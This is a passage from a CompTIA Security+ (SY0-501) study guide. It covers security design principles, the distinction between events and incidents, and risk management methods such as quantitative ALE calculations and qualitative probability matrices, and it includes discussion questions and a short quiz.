Closely related to the idea of defense in depth is security by design. The term is mostly used in software
development, but it's equally applicable to any design process. Simply put, security by design means that the
system was designed from the start with security in mind. In other words, you assume that it will be attacked
and plan accordingly. This means making sure it has as few vulnerabilities as possible, and that compromising
any given vulnerability does minimal damage to the system as a whole. By contrast, when a system wasn't
designed securely in the first place, making it secure after the fact requires more complex and intrusive
security measures that might still leave a lot of residual risk.
Securely designed systems tend to have secure policy principles built in, such as separation of duties and least
privilege. They have limited attack surfaces, or places that an attacker could target. They have secure default
settings, so that it's ideally more work to reduce security than increase it. Finally, they even are designed so
that if a component fails, it does so without compromising security.
Unfortunately, many technologies used in IT aren't secure by design, especially older ones created before
cybersecurity became a major priority.

Security through obscurity


Information security fundamentally is about keeping secrets. It only makes sense that many designers think
"how about I keep people from knowing I have a secret at all?" or "How about I keep the nature of my
security controls secret so no one can guess how to defeat them?" Imagine you have documents with
important secrets. You could hide them so no one knows where to look. You could write them in a foreign
language that most people around you can't read. You could put them in a safe that uses an unusual kind of
lock that most thieves wouldn't have experience at picking.
All of these approaches are examples of what is called security through obscurity, and there are plenty of
examples in modern cybersecurity. Developers of proprietary software often keep the inner workings of their
programs secret not only to prevent imitators but to make attacks against it more difficult. Administrators
running frequently attacked network services commonly use non-standard ports, just to make it less likely
someone will notice it's there and attack it. Other times, they choose a less popular software package over an
industry standard, specifically because attackers are less likely to expect it. Even with Wi-Fi hotspots it's
popular to disable SSID broadcast so casual lookers won't see it, or choose a network name that doesn't hint at
what kind of valuable information might be inside.

18 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module A: Security concepts

Security through obscurity is discouraged by most standards organizations. The biggest reason is because
obscurity is often used in place of other security controls. A document hidden in a book can be stolen by
anyone who thinks where to look, compared to a safe that protects it even if attackers know where it is. A
"hidden" Wi-Fi network is still easy for an attacker to find, as is a vulnerable service running on a different
port. A proprietary or uncommon software application, like an unusual lock design, probably doesn't have
fewer vulnerabilities, only fewer well-known ones - and a motivated thief is the most likely person to figure
them out.
In fact, many experts recommend that secure designs use the opposite approach, called open security. In the
open security approach, all the technologies and methodologies you use are known quantities based on openly
published technologies that anyone can inspect and dissect. That way, security experts can examine the
system and look for flaws or ways to improve it further; while attackers can study it as well, they don't have
any inherent advantage over defenders provided the design is sound to begin with. Under open security, the
goal is to design systems so secure that even knowing exactly how they work won't help an attacker get
inside.
In practice, there's nothing entirely bad about obscurity used as a layer of security. It doesn't hurt anything to
hide your network name, or to use a network service that gives little information to outside scans. The
important thing is that obscurity should never be used as a substitute for other security controls, but only as an
extra safeguard on top of a system that's secure even without it.

Discussion: Security strategies


1. Does your organization practice secure policy principles, such as least privilege, separation of duties, and
defense in depth?
Answers may vary.
2. What are some critical assets within your organization?
Answers may vary.
3. Were the systems surrounding those critical assets designed from the start with security in mind?
Answers may vary.

Events and incidents


In security you'll often hear a lot of "events" and "incidents." Like any time common words with general
meanings get used in technical discussions, it's important to distinguish what's meant by each. If you think
that both sound terribly broad but the second sounds a lot more ominous, you're actually off to a pretty good
start. In terms of information security, both have specific meaning, even if different sources draw the line in
different places.
An event, generally speaking, is any meaningful change in a system's state that is both detectable and
happened at a specific time. A router crashing is an event. So is an email arriving. So is an application being
installed, a user logging in, or the web server's load suddenly increasing enough that performance noticeably
drops. An event isn't necessarily good or bad, and while it's something you might want to log for later review,
it's not necessarily something you need to ever act on.
An incident is an event or series of events that is unexpected, unusual, and that poses some meaningful threat
to the system's functions, performance, or security. Of the previous examples, a router crashing is definitely
an incident, but for the others it depends on the details. The email might be routine or it could contain a virus,
the application could be normal or might violate network policies, and so on. By stricter definitions, incidents
are limited to human-caused events that threaten the network through malice or negligence; more generally,
they can include the result of disasters or other events that can compromise data security and business
operations. Even if there's not a person behind it, the harm can be the same.
The threats that can turn an event into an incident are pretty varied. Anything that damages the confidentiality,
integrity, or availability of sensitive data is an incident. Likewise, damage to physical assets is an incident. So

CompTIA Security+ Exam SY0-501 19


Chapter 1: Security fundamentals / Module A: Security concepts

are policy violations like misuse of assets or unauthorized changes to the network and its systems. Even just
unexpected system behavior can turn an event into an incident.
If an event is an incident, it needs to be acted on, even if it's just to make sure no damage was done and to see
what can prevent a recurrence. An alert is a signal that an event is an incident, whether it's from a user
observation of something wrong, or an automated report from a security system. That doesn't mean an
incident has actually occurred, but it does mean you need to act.

Event evaluation
Evaluating whether a security event is an incident or not is one of the great challenges of security, especially
since routine events in a busy network or active organization are so numerous. In fact, the main function of
detective controls is to either recognize security incidents automatically, or to give security personnel the tools
to spot them manually.

Exam Objective: CompTIA SY0-401 2.1.2, 2.1.3


Whenever a security reviewer or automated system analyzes a potential incident and makes a decision, there
are four possible results.

True positive A problem occurred, and the analysis recognized it. This is a good result: even if the
problem itself is bad, it was recognized and can be addressed.
True negative The event was benign, and triggered no alerts. This is a good result, since everything is
quietly working properly.
False positive The event was benign, but the analysis mistook it for a problem. This is bad: frequent false
alarms can disrupt routine functions, cost administrators time, or just make people less alert
when a real attack happens.
False negative A problem occurred, and the analysis mistook it for benign behavior. This is potentially
disastrous, since security could be compromised without anyone knowing.

As you can tell, the positive/negative side is all the analysis process sees, especially if it's an automated
system: the true/false element is reliant on human review and sometimes perfect hindsight. The goal of
managing any sort of detective process is to design a set of evaluation rules that minimize both false positives
and false negatives, with the understanding that it's always better to have a false positive than a false negative.
Over time and after review, evaluation rules can be refined to improve their accuracy.

Discussion: Events and incidents


1. Give an example of an event that isn't an incident.
Answers may vary.
2. Give an example of an event that is a likely incident.
Answers may vary,
3. Why is a false negative worse than a false positive?
False positives only do damage by consuming incident response resources. False negatives allow security
breaches to go undetected.

20 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module A: Security concepts

Assessment: Security concepts


1. Someone put malware on your computer that records all of your keystrokes What aspect of security was
primarily attacked? Choose the best response.
 Confidentiality
 Integrity
 Availability

2. What type of control would a security assessment procedure be? Choose the best response.
 Management
 Operational
 Physical
 Technical

3. Malware is a common example of a threat vector. True or false?


 True
 False

4. Which controls primarily protect data integrity? Choose all that apply.
 Backups
 Encryption
 Fault tolerance
 Hashing
 Need to know

5. A security program alerts you of a failed logon attempt to a secure system. On investigation, you learn the
system's normal user accidentally had caps lock turned on. What kind of alert was it? Choose the best
response.
 True positive
 True negative
 False positive
 False negative

CompTIA Security+ Exam SY0-501 21


Chapter 1: Security fundamentals / Module B: Risk management

Module B: Risk management


If security has a beginning, it's the calculation of risk. While it's possible to blindly add security controls and
hope adherence to general best practices will give you good results, without a detailed understanding of the
greatest risks to your organization's particular assets, you have no way of knowing if you've allocated your
resources effectively, or made critical oversights.
You will learn:
 How to identify assets and threats
 How to calculate risk
 How to manage risk

Risk assessments
When you begin formulating a security policy, you should begin with a risk assessment process designed to
determine your security needs. How involved it needs to be depends on the size and complexity of your
organization and the level of security it requires, but it should always be conducted in a formal and
methodical manner. The assessment should be performed by security personnel, but will require the input of
others as well: not only technicians and management, but also physical facilities crew to report on physical
security concerns, legal staff to advise about compliance issues, anyone who regularly handles valuable
assets, and potentially outside security consultants.
There are several steps involved in a complete risk assessment:

1. Identify assets potentially at risk.


2. Conduct a threat assessment for each asset.
3. Analyze business impact for each threat.
4. Determine the likelihood of a given threat doing damage.
5. Prioritize risks by weighing likelihood vs. potential impact of each threat.
6. Create a risk mitigation strategy to shape future security policies.
Remember that risk assessment is just the first part of an overall operational security process. Once you've
created a risk mitigation strategy, you need to formalize security policies, and apply security controls.

22 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module B: Risk management

Risk registers
The list of risks to any major project can be very long, and as the risk assessment process goes on the amount
of important data you need to compare for each of them increases. Early in the process, it's a good idea to set
up a risk register, a formal document of the risks you've discovered and what data you've correlated or
calculated about them. Depending on the scope of the project and how many people are involved you could
use a spreadsheet, a more complex database, or even dedicated risk management software.

Exam Objective: CompTIA SY0-501 5.3.2.5


For each risk you identify, the risk register should have a variety of fields, with details corresponding to the
process you're using:
 A unique ID and description
 A category, to help group similar risks
 Likelihood
 Business impact
 Priority
 Mitigation steps and strategies
 Residual risk remaining after mitigation
 Contingencies that can be taken if the risk can't be prevented
 The "owner" of the risk, who is responsible for managing it

Identifying assets
When you begin a risk assessment, you first need to identify all of your organization's assets, as well as their
value. You don't need to worry yet about what threats they might face—that comes later. Instead, focus on
making sure the list is complete. If you miss important assets, you might forget to secure some of them at all.
Exactly what assets you have depends on the nature of your organization and its business operations, but
some common elements include the following.

Exam Objective: CompTIA SY0-501 5.3.2.4

 Information and data


• Customer information
• Intellectual property and trade secrets
• Operational data like financial and security information
 Computing hardware and software
 Business inventory
 Building or other physical facilities
 Cash or other financial assets
 Personnel
 Branding and business reputation
 Business relationships, including partner assets in your organization's keeping

CompTIA Security+ Exam SY0-501 23


Chapter 1: Security fundamentals / Module B: Risk management

Threat assessments
Once you know your assets, you're ready to conduct a threat assessment by considering all of the bad things
that could happen to each of your assets. At this point, don't be afraid to include wild improbabilities, as long
as you recognize them for what they are: later on you'll take the likelihood of each threat into account, and
more credible threats will take priority over irrational fears.

Exam Objective: CompTIA SY0-501 5.3.1, 2.3.9.2


When assessing threats, it's helpful to consider them from multiple angles: the harm that can be done to the
asset, the source of the threat, and the threat vector, or method by which it occurs. Deliberate attacks may be
the most varied and rapidly evolving category of threat, but they're not the only one you need to worry about.

Environmental accidents Fire, architectural failure, or anything else going wrong in the physical
environment can damage assets, especially in an industrial facility. Long-term
power outage can also be considered an environmental threat.
Natural disasters Floods, earthquakes, hurricanes, tornadoes, electrical storms, landslides, and any
other sort of natural occurrence in your region.
Equipment failure Computing hardware, network devices, storage media, and industrial equipment
all can fail. Don't just consider the threat to the failed equipment itself: for
example, consider how data is threatened by a drive failure, or how industrial
equipment can be damaged by a faulty control system.
Supply chain failure Every organization needs goods, services, people, information, and other
resources to do business and to cope with damaging incidents. Inability to get
critical resources at the wrong time can hurt operations and incident response
efforts. It's also possible to receive defective or sabotaged goods and information,
or even allow malicious contractors or employees in during a project.
Human error Accidental human behavior doesn't just risk directly damaging assets, it can also
compromise security indirectly. Users can accidentally access or distribute data
they don't realize is sensitive, or introduce vulnerabilities by actions that seem
innocuous. It's even easy for a technician fixing a performance or security issue to
inadvertently create a new one in the process.
Malicious outsiders Outside attacks can take many forms: physical intrusion for purposes of theft or
vandalism, unauthorized network access, distribution of malware, or attempts to
defraud employees. Even attacks that don't directly harm assets can be used to
gain access or trust within the organization, paving the way for a later inside
attack.
Malicious insiders Attackers who already have trust or access within the organization are perhaps the
most dangerous sort of threat, since they're frequently in a position to bypass
safeguards and exploit vulnerabilities in ways an outsider couldn't. Some
malicious insiders act out of greed or personal gain, either to steal assets or
advance themselves in the organization. Others seek revenge on rival employees
or the organization itself, or just act irresponsibly out of boredom. For some
organizations, industrial or state espionage can be a threat. Inside threats don't
have to be employees: contractors, guests, couriers, and anyone else given
legitimate access to your facilities or assets is a potential attacker.

24 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module B: Risk management

Impact analysis
Once you've listed the threats facing your organization, you need to list the potential costs or other impact if
they occurred. You need to calculate both direct and indirect impact: for example, destruction of the server
holding the company's web storefront doesn't just mean paying for parts and labor to replace it, you'll also
lose sales revenue for the whole time it's out. Likewise, impact can be tangible or intangible: damage to a
company vehicle has a concrete price tag attached, while gaining a corporate reputation for carelessness with
sensitive data can be extremely costly in the long term but difficult to quantify.

Exam Objective: CompTIA SY0-501 5.2.7, 5.3.2.8


Common types of impact you should consider include:

Asset replacement cost The equipment and labor cost required to repair or replace an asset harmed by a
threat. Loss or theft of certain information in particular can be difficult or
impossible to truly repair.
Revenue or opportunity A disabled or compromised resource can prevent your organization from selling
loss goods or performing services, affecting incoming revenue directly or by loss of
new business opportunities.
Production loss Loss of production assets can leave employees unable to produce goods or achieve
other organizational goals. Production delays can lead to revenue loss, or
increased labor costs catching up after the fact.
Human costs Threats to human health or safety are the most severe from an ethical perspective,
above and beyond how they can affect business operations. Safety threats can
affect employees, customers, or the surrounding community depending on the
nature of your business.
Reputation Threats can easily damage your organization's reputation with potential customers
or business partners, especially if they're high profile or outwardly obvious. In
particular, if it (rightfully or not) appears that you failed to take proper
precautions, outside parties will lose confidence in your organization's capabilities
and responsibility. Even if your organization clearly isn't at fault for what
happened, failure to quickly recover from a problem can lead to a reputation for
being unreliable or unprepared.
Legal consequences Many laws or industry regulations require measures to be taken against likely
threats. Failure to comply with these can lead you or your organization to
consequences ranging from loss of industry certifications, to fines, to civil or
criminal charges. Especially when it comes to regulatory compliance, it isn't only
important that you adhere to required practices: you must be able to demonstrate
after the fact that you exercised due diligence in complying with the regulations
and that failures were outside your control.

CompTIA Security+ Exam SY0-501 25


Chapter 1: Security fundamentals / Module B: Risk management

Supply chain assessments


If your organization is already involved in manufacturing, distributing, or selling goods, you're probably
already aware of how a shortage or distribution problem for even a single critical component can hurt the
entire business. Even if you're not, every business has similar issues with the equipment, services, personnel,
and resources they use. For instance, the impact of losing a critical server is all the higher if it relies on legacy
hardware that's no longer manufactured. An application that relies on frequent security updates will be an
issue if its publisher goes out of business or stops supporting it. Critical jobs that require a highly specialized
skillset might be difficult to recruit for. In almost any organization a power or internet outage can be
crippling.

Exam Objective: CompTIA SY0-501 5.3.2.7


Attackers can also use your supply chain to attack your company. Hardware or software you receive from
outside parties might be compromised to make stealing data from you easier. Outside organizations and
personnel given access to your facilities and data might use it to become inside attackers, as can newly
recruited employees. Attackers might even disrupt your suppliers and infrastructure providers in ways that
directly hurt your business operations. Data that you share with third parties might be attacked in transit or
while in their hands. If you produce products or services, you even have to worry about downstream supply
chain issues that can affect your finances or company image, like theft or counterfeits. However you secure
your organization, it's hard to be sure that third parties you deal with are equally secure.
An important part of the risk management process is identifying threats that come from your supply chain. As
part of analyzing threats you can perform a supply chain assessment that maps out your supply chains and the
ways they can cause risk to your business operations. Particular areas of interest should be ways that a supply
chain disruption can cause failures in critical business operations and ways that supply chain relationships can
cause data breaches, but depending on your overall security needs you might need to go into a lot of depth.

Privacy impact assessments


One of the chief worries in informational security today is about how advancing technology threatens
individual privacy. Not only do your customers and employees not want their personal information to be
carelessly shared, there's a large and growing body of laws and industry regulations dedicated specifically to
protecting it. This means privacy protections are an essential part of both business relationships and
regulatory compliance.

Exam Objective: CompTIA SY0-501 5.2.8, 5.2.9


Exactly how you have to factor privacy into the risk assessment process depends on what data you keep and
what regulations apply to it. In the United States, federal agencies are required to perform a formal privacy
assessment process every three years, or whenever there's a significant change in the systems or processes
they use to collect, maintain, or disseminate personal information. Similar regulations apply in other countries
or to many private organizations. There are two stages to the process.
First, the agency must conduct a privacy threshold analysis (PTA) to determine whether the system in
question actually handles any personally identifiable information (PII). This might be a simple questionnaire
which the system owner can fill out and submit to the agency's privacy officer, but it's still a formal legal
assertion about informational assets.
If the privacy officer determines that the system handles PII, the agency must perform a privacy impact
assessment (PIA), which is a special type of risk assessment focused on PII. A PIA is much more in depth than
a PTA, and serves three primary goals:

1. To ensure compliance with all external regulations and internal policies regarding privacy
2. To analyze potential privacy risks and their potential impacts
3. To evaluate security controls that can be used to minimize risks

26 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module B: Risk management

To serve these goals the PIA should follow the overall process of any other risk assessment: determining the
informational assets that must be protected, calculating their potential risks, and designing mitigation
strategies that comply with regulatory and policy needs. You can integrate this process into the rest of your
risk assessment, provided that you still perform the specific steps required for compliance.

Threat probability
In the assessment process so far, you've spent your time compiling pessimistic lists of all the bad things that
can possibly happen and all the destruction they can cause. That's the sort of knowledge that can help to keep
you safe, but to turn it into a realistic analysis you also need to know how likely each of those events are. If
you're conducting a large scale and formal assessment you might contract an actuarial service to help you
determine the odds of a given threat coming to pass, but otherwise you'll need to perform your own research
and make estimations.

Exam Objective: CompTIA SY0-501 1.6.10, 5.2.2., 5.2.3, 5.3.2.6

 Existing incident logs are a valuable if imperfect resource for predicting future threats.
 The probability of threats such as disasters, accidents, and burglary depend on your physical location
and field of business, so you can research relevant factors.
 Equipment manufacturers typically state expected failure rates for their products. You can also research
user or third-party reviews for additional reliability perspectives. You'll encounter some common terms
in reliability reports, but note that they're often used imprecisely or inaccurately.

• Mean time to failure (MTTF) represents the average time it takes for a newly installed device to fail.
It's most accurately used for components or devices that are typically replaced rather than repaired,
such as a light bulb or hard drive.
• Mean time to repair (MTTR) is the average time it takes to repair a serviceable device. For example,
you could use MTTR to describe the time it takes to bring a server back to full operation after a hard
drive or other component fails.
• Mean time between failures (MTBF) is sometimes used interchangeably with MTTF, but it's more
properly used to describe the average uptime between failures on a serviceable device, not counting
time it's offline for repair. To continue the example, you would use MTBF to describe how long you
should expect the newly repaired server to remain online before experiencing some other sort of
failure. If a piece of equipment has a high MTTR and a low MTBF, it's likely to spend a lot of its
lifetime undergoing repairs.
• Mean time between service incidents (MTBSI) is the average time from one failure to the next
failure, including the time needed for repairs. MTBSI is equal to MTBF + MTTR.

 Security organizations and vendors frequently publish statistics and trends regarding malware, network
attacks, and other technological threats. You can use these to help estimate the most likely threats to
your organization.
 Business processes themselves can have vulnerabilities which allow an accident or attack to do damage
through outwardly normal activity. Finding these can require someone expert in both the field of
business and the technical systems you use for the process.
 When all else fails, you can contact an expert on the type of threat, and ask for an educated guess.

CompTIA Security+ Exam SY0-501 27


Chapter 1: Security fundamentals / Module B: Risk management

Especially when it comes to attacks, you don't need to know the raw odds of a threat occurring, you need to
know the chance that it will successfully damage your assets. The best way to do this is to perform a
vulnerability assessment testing just how resistant your organization is against likely attacks and other threats.
You might even want to perform a penetration test simulating attacks against your assets. Testing
vulnerabilities is a whole process in itself which is beyond the scope of this topic, but at the least it involves
two phases:
 Examining your organization's assets and operational procedures to see if a given threat will actually
affect it. For example, if you heard of a new attack against database applications, you should determine
if your database software and version is vulnerable.
 Reviewing your existing security controls and evaluating how well they can respond to the threats
you've recognized. In the previous example, even if your database software is vulnerable, the right
application configurations and network safeguards might still be able to protect against it.

Discussion: Beginning a risk assessment


1. Create a short list of assets important to your organization.
Answers may vary, but might include physical assets, important data, personnel, financial resources, or
business relationships and reputation.
2. Do any of those assets include PII?
Answers may vary, but most organizations handle private employee data at least.
3. Choosing one of the assets you've listed, identify the threats which could impact it.
Answers may vary,
4. Of the threats you've listed, identify ways they could impact the chosen asset.
Answers may vary, but impacts may be financial, operational, legal, or affecting business revenue or
reputation.
5. How would you determine just how likely each of the threats you've listed is?
Answers may vary, but can include research, vulnerability assessments, or penetration tests.

Risk measurement
At this point in the process you should know what threats face your organization, how likely each is to
actually occur, and the damage each can do. This isn't just in order to know what's at stake: it's how you can
determine where you need to apply security controls first and most intensely. Security controls aren't free: not
only do you have limited resources to spend on protecting your assets, even if you didn't it would probably be
a poor exchange to spend $1000 to prevent $200 in potential damages.
There are two primary methods for measuring and prioritizing risks, and which you should use depends on the
assets you're protecting and the threats you're protecting against.
 Quantitative risk assessment assigns an objective value, typically a monetary figure, to each risk based
on the probability and impact cost of the associated threat. It can give a clear cost-benefit analysis for a
given security control, but it's only accurate when you can determine a clear and concrete cost for each
potential impact.
 Qualitative risk assessment also begins with the probability and impact cost of each threat, but instead
of monetary values it uses human judgment to calculate and assign a priority to the associated risk. By
its nature, qualitative risk assessment is inexact and subject to the biases and areas of expertise of
whoever is doing the analysis, but it can work even for assets and impacts with intangible costs.

28 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module B: Risk management

In practice, you might want to use a combination of both approaches. Especially when you're comparing
alternative security approaches for your tangible assets, it's easy to do a quantitative analysis, while relying
qualitative comparisons for less straightforward elements.

Quantitative risk assessment


The objective monetary values created by quantitative assessments are attractive for many reasons. Not only
do they let you easily determine the value of a security control, they also are easy to communicate to others.
When you're presenting your risk assessment to upper management, a statement like "A $10,000 backup
power system will save an estimated $50,000 in lost revenues over the next three years" is language they don't
need a security background to understand. The challenge is calculating these values accurately.

Exam Objective: CompTIA SY0-501 5.3.2.1, 5.3.2.2, 5.3.2.3, 5.3.2.9


A common approach to quantitative assessment uses the following values:

SLE Single loss expectancy is the cost of any single loss. If a threat would cause the complete destruction
of an asset, such as a stolen laptop, the SLE is simply the asset value. If a threat would merely
damage an asset, such as a flood doing costly damage to a facility but leaving it repairable, the SLE
is the asset value multiplied by an exposure factor representing an estimated damage percentage
ARO Annual rate of occurrence is how many times you expect a given type of loss to occur a year. It
doesn't need to be an integer: if your company has ten laptops stolen in the average year, the ARO is
10. If your warehouse by the river floods about every 20 years, the ARO is 0.05.
ALE Annual loss expectancy is the cost per year you can expect from the threat, or the SLE × ARO. In the
previous examples, 10 stolen $2500 laptops a year comes out to an ALE of $25,000, while
$1,000,000 in flood damage every 20 years produces an ALE of $50,000.

Once you've made these calculations, you can apply them against the cost of a given security control. If an
annual $5000 in locks and tracking software can cut your laptop losses in half, that saves you a net $10,000 a
year, so it's a clear benefit. On the other hand, if moving to a new warehouse facility out of the flood zone
increases annual business costs by $60,000 a year, it would be a net loss.
Even in quantitative analysis the numbers are estimates, and you might consider other factors. For example,
once you account for business disruptions caused by a flood, or the fact that a large and unexpected loss can
do more financial harm than a small planned increase in long-term expenses, the new warehouse might still be
worth the price.
Quantitative analysis needs to have objective numbers, but they don't always have to be monetary values. As
long as you have consistent, internally repeatable numbers, you can perform a quantitative analysis using
performance metrics from automated tools, uptime values, or anything else that can be calculated and maps to
business benefits and costs.

Qualitative risk assessment


Qualitative risk assessment doesn't rely on having concrete financial values for the impact of losses, or strict
percentages for likelihood. This has some real advantages: it's quick and easy, and you can apply it to
situations where you don't or can't have solid numerical data. On the other hand, the result is an assessment
fundamentally based on guesses and hunches, and is only as good as the judgment of the creator.

Exam Objective: CompTIA SY0-501 5.3.2.10


To get around this problem, it's important to still use a formalized process in qualitative risk assessment, and
to avoid personal biases or blind spots by using the input of multiple experts on the assets and threats
involved. A common way to compensate for this is to interview multiple experts for input, or to assemble a
focus group of individuals with different areas of concern or expertise.

CompTIA Security+ Exam SY0-501 29


Chapter 1: Security fundamentals / Module B: Risk management

Even if qualitative assessments heavily use subjective judgments, it's still common to prioritize threats using
numerical values. For a simple system, you might assign a 1-10 value for the probability of a threat, and
another 1-10 value for its potential impact to the organization. By multiplying the two values in a probability
matrix, you get a 1-100 result. For example, an SQL injection attack that's very likely to occur (8), but targets
a database of only moderate impact to the company (5) would have a risk priority of 40.
Probability Description Level
Very Unlikely A theoretical possibility that should be accounted for but would be very 1
unusual.

Unlikely A potential threat that's uncommon but not unheard of. 3

Likely A fairly common but not extremely frequent threat. 5

Very likely A very common threat that has a high chance of occurring. 8

Almost certain A threat that's almost guaranteed to occur sooner rather than later. 10

Impact Description Level


Very low The threat can cause almost no damage. 1

Low The threat can cause minor but measurable damage. 3

Medium The threat can cause real damage with significant recovery cost. 5

High The threat can cause serious damage to overall business operations. 8

Severe The threat can cause major damage or massive losses to the organization. 10

A high probability or high impact on its own doesn't give a risk a high priority. For example, commercial
spam email is an unavoidable fact of life, but it doesn't really do much harm. By contrast, a massive gas
explosion caused by employee error would be devastating, but for most businesses it's extremely unlikely. On
the other hand, spam messages with malware attachments or phishing links can do real harm, and in an
industrial plant, accidental explosions might be reasonably likely: In those cases, the overall priority goes up
and you'll want to put security resources toward mitigating the risk. The worst threats are those which are
both highly likely, and highly damaging: these are the ones you'll need to work hardest to defend against.

30 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module B: Risk management

Risk management
In the end you don't just need to identify risks, you need to decide how to act on them. Depending on a risk's
nature, its priority, and your available resources, you could choose between multiple strategies to manage it.

Exam Objective: CompTIA SY0-501 5.3.2.12

Risk Choosing not to engage in activities that could expose your organization to the risk. For
avoidance example, if you're worried about USB flash drives being used to steal data or deliver malware,
you could choose to forbid them on company computers, and even enact group policies
preventing users from connecting removable storage devices. Risk avoidance often is the
most effective way to manage risks, but in many situations it's expensive or restrictive of your
normal business operations. In this case, some organizations might find a total inability to use
removable storage to be disruptive or at least inconvenient.
Risk Transferring some or all of the risk to another party which will assume responsibility, usually
transference for a direct financial cost. The most common means of risk transference is purchasing
insurance for expensive physical assets: while the destruction of your factory's production
equipment might have an impact too high for your company to survive, the insurance
company has the assets to cover the costs of a disaster. Other transference strategies rely on
external services that include security. In these cases, the provider assumes liability as part of
the service agreement.
Risk Applying security controls in order to reduce risk. Mitigation is distinct from avoidance
mitigation because it aims to limit the risk of an activity without preventing the activity outright: if
banning flash drives would be too much of a hassle, you could require malware scans
whenever they're connected, and prevent workstations from running executable files directly
from them. Since so many security controls can be considered part of this strategy, risk
mitigation can be considered the broadest security strategy.
Risk Applying visible deterrent controls in order to discourage attacks or human error from
deterrence occurring in the first place. While this can easily be classified as just a form of mitigation,
some sources, including CompTIA, categorize it separately. Deterrent controls might include
bright lights and obvious guards around a secure facility. Deterrence can be especially
effective for safety threats: just labeling a high voltage wire will make people much less likely
to grab onto it.
Risk Choosing not to apply security controls, and hoping that the risk just doesn't hurt you.
acceptance Acceptance is a good strategy when the others don't offer a cost-effective way to reduce risk,
and is especially common either with risks that are very unlikely, or very low in impact. For
example, you might not choose to take any special measures against the occasional theft of
paperclips or the risk of a devastating but very unlikely earthquake. You could also accept a
risk temporarily, when another strategy will take time to implement. Remember, ignoring a
risk only counts as acceptance when you know it's there in the first place: if you never
identified the threat at all, that's a failure in your threat assessment.

Risk management seldom completely eliminates risk: even avoidance strategies often just turn a high
probability threat into a very unlikely one. If the remaining residual risk is great enough you might want to
evaluate additional reduction methods, but eventually you'll need to accept what your security strategy can't
eliminate.

Risk mitigation
As an information security professional, a lot of your work is going to focus on risk mitigation, whether it's
choosing controls, implementing them, or enforcing them. Mitigation isn't just a strategy in itself: since it
encompasses so many different techniques, there are a number of mitigation strategies that you'll need to

CompTIA Security+ Exam SY0-501 31


Chapter 1: Security fundamentals / Module B: Risk management

choose from or use in combination. In large part, they correspond to the ways you can classify security
controls.

Technology While some technical controls in your organization might be intended to protect physical
controls assets or personnel, especially in information systems you'll see them used to make sure
that valuable data isn't damaged, rendered unavailable, or especially leaked to the wrong
people. Data loss prevention (DLP) goals can be achieved by controls such as encryption,
firewalls, backup systems, and device hardening.
Policies and Administrative and operational controls are an important part of any risk mitigation
procedures strategy. Even if technical controls will achieve most of your goals, you still need the
policies and procedures to ensure they're applied properly and consistently. For example,
even if your remote access system requires authentication, without a strong password
policy there's still a high risk of unauthorized logins.
Routine audits Whatever your security settings, they must be periodically reviewed to look for
unauthorized changes or unnoticed problems. Audits can include review of user
permissions or security configurations, review of security logs to find suspicious activity,
vulnerability assessments, or more.
Incident When something does go wrong with security, you need to have an incident response
management process to determine what harm was done, minimize or repair damage, and restore the
system to a secure state. You may also need to preserve evidence for later investigation.
Change When you change the configuration of a system or network, you run the risk of adding
management new security vulnerabilities, or weakening existing security controls. Changing policies
and procedures can likewise compromise security. Any changes to your organization's
functions should be conducted as part of a change management process that assesses their
security impact and makes necessary adjustments.

Automated security
One problem when you enact any sort of risk mitigation is that humans are very fallible, especially when it
comes to day-to-day routine operations or maintaining complex systems. It only takes one mistake to leave a
critical vulnerability in place. The other problem is that manual configuration and monitoring of security is
labor-intensive, and all the more so when people have to check over each other's work.

Exam Objective: CompTIA SY0-501 3.8.1


Whenever possible, it's best to use automated procedures and tools to enact technical controls, audit
compliance, document security-related events, and anything else that can be done in a programmatic fashion.
Human oversight is still essential, but any good automated system can be designed to gather and present data
about its activities to assist in verification.
There are a wide variety of automated tools and products that may suit your security needs. Some include:
 Device or system configuration tools
 Continuous monitoring and alert systems
 Configuration validation tools
 Vulnerability scanners
 Remediation tools
 Patch management software
 Automated troubleshooters
 Application testers

32 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module B: Risk management

Many automation tools rely on scripts, special programs designed to emulate what a user could do with a
sequence of sequential manual actions. For example, a configuration validation tool for a web server might
consist of a list of sequential checks of server security settings. When you run it, it checks all of those settings
and then lists the results with much less time and effort than you could have done. Likewise, setting security
policies on a workstation might involve a script or database file with the settings you want, and a program that
will configure them all at once for you.
The lingering risk of any automated tool is that it can't check or change a setting unless it's been instructed to
do so, and computers have limited insight as to when an instruction is a bad idea. At some level any script,
alert, or configuration template must be configured by a human who can still make mistakes. On the up side,
if you save that much time using automation, you can at least spare some of it making sure your automated
tools are accurate and up to date.

Securing the security assessment


Different security documents need to be distributed or secured in different ways. Public rules should be
widely distributed, employee procedures to whoever needs to use them to perform a job securely, security
configuration data only to administrators who will enforce it, and so on. A risk assessment is one of the most
sensitive types of document, since it can be a treasure map showing the way right through your defenses. It
lists your valuable assets, the vulnerabilities you know about, and how you've chosen to secure them.
Attackers who see the results of your assessment can look for an unlikely threat you've decided not to protect
against, and target it specifically. They might also be able to judge residual risks left after a mitigation
strategy, or even worse notice a threat vector you overlooked and failed to protect against.
Any kind of security assessment, whether it's focused on threats, risks, or vulnerabilities, needs to be treated
as sensitive information and distributed on a need to know basis. Even if someone's involved in the process
that doesn't mean they need to have access to everything; it might be more appropriate to simply give them
the details relevant to their responsibilities and areas of expertise. For that matter, non-technical upper
management might not even want more than a clear set of bullet points and a cost/benefit analysis to review;
if so, that's exactly what you should give them. The fewer eyes that see the full details of your security
posture, the fewer there are who can take malicious action or accidentally leak information to someone who
will.

Discussion: Managing risks


If you didn't already perform the "Beginning a risk assessment" discussion, you'll need an asset, a list of
threats to it, and the impact and probability of each threat.
1. Would it be more appropriate to perform a qualitative risk analysis, or a quantitative one?
It depends on the asset you’ve chosen and the threats you've listed. You might need to use a combination
of both.
2. How could you perform a quantitative risk assessment on assets and impacts without clear monetary
values attached?
As long as you have consistent, internally repeatable numbers, you can perform a quantitative analysis
using performance metrics from automated tools, uptime values, or anything else that can be calculated
and maps to business benefits and costs.
3. For each risk you've identified, suggest at least one method to manage it. Identify the method's underlying
strategy, the type of control it employs, and whether it could be automated.
Answers will vary.
